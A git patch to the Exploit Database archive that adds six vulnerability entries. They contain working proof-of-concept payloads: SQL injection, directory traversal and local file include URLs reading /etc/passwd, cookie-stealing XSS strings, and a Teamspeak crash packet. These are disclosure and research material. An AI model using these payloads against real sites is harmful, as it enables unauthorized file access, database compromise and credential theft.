From 60e5c6c2a0962277a186d3c734127aa1f4e6f805 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Mon, 13 Oct 2014 04:45:24 +0000 Subject: [PATCH] Updated 10_13_2014 --- files.csv | 6 ++++++ platforms/asp/webapps/34936.txt | 9 +++++++++ platforms/php/webapps/34935.txt | 7 +++++++ platforms/php/webapps/34937.txt | 21 +++++++++++++++++++++ platforms/php/webapps/34939.txt | 20 ++++++++++++++++++++ platforms/php/webapps/34940.txt | 10 ++++++++++ platforms/windows/dos/34938.txt | 14 ++++++++++++++ 7 files changed, 87 insertions(+) create mode 100755 platforms/asp/webapps/34936.txt create mode 100755 platforms/php/webapps/34935.txt create mode 100755 platforms/php/webapps/34937.txt create mode 100755 platforms/php/webapps/34939.txt create mode 100755 platforms/php/webapps/34940.txt create mode 100755 platforms/windows/dos/34938.txt diff --git a/files.csv b/files.csv index 216b9b475..dcc265309 100755 --- a/files.csv +++ b/files.csv @@ -31456,3 +31456,9 @@ id,file,description,date,author,platform,type,port 34932,platforms/linux/remote/34932.html,"NitroView ESM 'ess.pm' Remote Command Execution Vulnerability",2010-10-26,s_n,linux,remote,0 34933,platforms/php/webapps/34933.txt,"FlatNux 2009-03-27 Multiple Cross Site Scripting Vulnerabilities",2009-06-03,intern0t,php,webapps,0 34934,platforms/php/webapps/34934.pl,"Joomla! Projects 'com_projects' Component SQL Injection and Local File Include Vulnerabilities",2010-10-27,jos_ali_joe,php,webapps,0 +34935,platforms/php/webapps/34935.txt,"LES PACKS 'ID' Parameter SQL Injection Vulnerability",2010-10-27,Cru3l.b0y,php,webapps,0 +34936,platforms/asp/webapps/34936.txt,"i-Gallery 3.4/4.1 'streamfile.asp' Multiple Directory Traversal Vulnerabilities",2009-06-03,"Stefano Angaran",asp,webapps,0 +34937,platforms/php/webapps/34937.txt,"Feindura CMS Groupware Multiple Local File Include and Cross Site Scripting Vulnerabilities",2010-10-28,Justanotherhacker.com,php,webapps,0 +34938,platforms/windows/dos/34938.txt,"Teamspeak 2.0.32.60 Memory Corruption Vulnerability",2010-10-28,"Jokaim and nSense",windows,dos,0 +34939,platforms/php/webapps/34939.txt,"W-Agora 4.1.5 Local File Include and Cross Site Scripting Vulnerabilities",2010-10-27,MustLive,php,webapps,0 +34940,platforms/php/webapps/34940.txt,"212cafe WebBoard 2.90 beta 'view.php' Directory Traversal Vulnerability",2009-05-29,MrDoug,php,webapps,0 diff --git a/platforms/asp/webapps/34936.txt b/platforms/asp/webapps/34936.txt new file mode 100755 index 000000000..92cfa73fa --- /dev/null +++ b/platforms/asp/webapps/34936.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/44467/info + +i-Gallery is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Remote attackers can use a specially crafted request with directory-traversal sequences ('../') to download and read arbitrary files in the context of the webserver. Information harvested may aid in launching further attacks. + +i-Gallery 3.4 and 4.1 are vulnerable; other versions may also be affected. + +http://www.example.com/igallery41/streamfile.asp?i=./../../../index.asp&f=subdir \ No newline at end of file diff --git a/platforms/php/webapps/34935.txt b/platforms/php/webapps/34935.txt new file mode 100755 index 000000000..392d355b7 --- /dev/null +++ b/platforms/php/webapps/34935.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/44457/info + +LES PACKS is prone to an SQL-injection vulnerability. + +An attacker can exploit this SQL-injection issue to carry out unauthorized actions on the underlying database, which may compromise the application and aid in further attacks. + +http://www.example.com/index.php?Page=articles&ID=-1+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15 \ No newline at end of file diff --git a/platforms/php/webapps/34937.txt b/platforms/php/webapps/34937.txt new file mode 100755 index 000000000..3d120a2f3 --- /dev/null +++ b/platforms/php/webapps/34937.txt @@ -0,0 +1,21 @@ +source: http://www.securityfocus.com/bid/44501/info + +Feindura CMS is prone to multiple local file-include vulnerabilities and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit the local file-include vulnerabilities using directory-traversal strings to view and execute local files within the context of the webserver process. Information harvested may aid in further attacks. + +The attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +Feindura CMS versions 1.0rc and prior are vulnerable. + +Local file Include: + +http://www.example.com/[path]/library/process/download.php?filename=[path/to/file] + +http://www.example.com/[path]/library/thirdparty/filemanager/connectors/php/filemanager.php?mode=download&path=[path/to/file] + +http://www.example.com/[path]/?language=../../../../../../../etc/passwd%00 + +Cross Site Scripting: + +http://www.example.com/[path]/library/sites/editor.php?category=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/34939.txt b/platforms/php/webapps/34939.txt new file mode 100755 index 000000000..6bdeb9b3b --- /dev/null +++ b/platforms/php/webapps/34939.txt @@ -0,0 +1,20 @@ +source: http://www.securityfocus.com/bid/44507/info + +W-Agora is prone to multiple local file-include vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker can exploit these vulnerabilities to view and execute local files within the context of the webserver process or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +W-Agora 4.1.5 is vulnerable; other versions may also be affected. + + +http://www.example.com/news/for-print.php3?bn=x&key=1282850719%3Cscript%3Ealert(document.cookie)%3C/script%3E +http://www.example.com/news/for-print.php3?bn=%3Cbody%20onload=alert(document.cookie)%3E +http://www.example.com/news/login.php3?bn=x&loginform=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E +http://www.example.com/news/login.php3?bn=%3Cbody%20onload=alert(document.cookie)%3E +'conf' folder: +http://www.example.com/news/for-print.php3?bn=1 +http://www.example.com/news/login.php3?bn=1 + +Any folder (only on Windows-servers): +http://www.example.com/news/for-print.php3?bn=..\1 +http://www.example.com/news/login.php3?bn=..\1 \ No newline at end of file diff --git a/platforms/php/webapps/34940.txt b/platforms/php/webapps/34940.txt new file mode 100755 index 000000000..5a3a3126c --- /dev/null +++ b/platforms/php/webapps/34940.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/44510/info + +212cafe WebBoard is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. + +Remote attackers can use a specially crafted request with directory-traversal sequences ('../') to retrieve and read arbitrary files in the context of the webserver. Information harvested may aid in launching further attacks. + +212cafe WebBoard 2.90 beta is vulnerable; other versions may also be affected. + +http://www.example.com/webboard/view.php?topic=../../../../../../etc/passwd%00 +http://www.example.com/webboard/view.php?topic=../../../../../../WINDOWS/system32/eula \ No newline at end of file diff --git a/platforms/windows/dos/34938.txt b/platforms/windows/dos/34938.txt new file mode 100755 index 000000000..a9e3f6bfb --- /dev/null +++ b/platforms/windows/dos/34938.txt @@ -0,0 +1,14 @@ +source: http://www.securityfocus.com/bid/44502/info + +Teamspeak is prone to a memory-corruption vulnerability. + +Attackers can exploit this issue by sending a specially crafted voice transmission packet containing malicious data. + +Successful exploits can allow attackers to execute arbitrary code with the privileges of the user running the application. Failed exploit attempts will result in a denial-of-service condition. + +Teamspeak version 2.0.32.60 is vulnerable. + +The following proof-of-concept packet is available: +f2be000426ad7e00300000000001000a414141414141414141424141414141 +4141414141414141414141414141414141414100ff99414141424242424141 +414141414141414141 \ No newline at end of file